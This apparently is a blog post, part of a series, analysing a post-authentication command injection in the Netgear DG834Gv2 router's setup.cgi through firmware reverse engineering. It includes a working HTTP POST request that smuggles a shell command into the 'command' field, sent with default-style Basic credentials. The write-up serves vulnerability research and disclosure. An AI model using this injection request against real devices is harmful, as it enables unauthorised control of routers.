B8: Looking into routeur Netgear DG834Gv2 - part 2
We will keep the same hierarchy as in the previous post.
Firmware version v1.05.00
Command injection in the test ADSL functionality (post-auth)
Looking into /usr/sbin/setup.cgi with Ghidra
I was able to identify with the string search feature that within the function
FUN_00405d44, the string “command” seems to be expected. Moreover it is the
only occurrence of this string in the CGI script.
So we look at what the function COMMAND do:
The COMMAND function seems to write the formatted string of its first
parameter with the second (the one we are controlling), within the file
/etc/cmd_agent.
Let’s see with the root shell acquired through the UART port what it does to
write into file /etc/cmd_agent.
We realize that the command written in the file /etc/cmd_agent is executed.
By performing the ps command we realize that a binary with a name similar to
our file is running:
/usr/sbin/cmd_agent_ap
Let’s see what this binary does within Ghidra:
It is therefore this binary that is responsible for reading and executing the
contents of the file /etc/cmd_agent using the function system. We just have
to identify the HTTP request that will allow us to execute system commands in an
arbitrary way.
Example of a POST request to exploit the vulnerability:
POST /setup.cgi HTTP/1.1
Host: 10.X.X.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Length: 132
command=$(/bin/busybox echo HIT>/tmp/POC %26%26 /bin/busybox echo ADIAGRALL)&tone=1&go=++Go++&next_file=adsl_test.htm&todo=adsl_test
It should be noted that this is also exploitable via an HTTP GET request:
Several other ways to reach the COMMAND function have been identified within
the functions:
FUN_00405d44()FUN_004084c8()FUN_00408a30()FUN_0040a560()FUN_0040a644()
The next post will describe how it is possible to find the backdoor discovered by Eloi Benoist-Vanderbeken by looking for post-auth accessible vulnerabilities.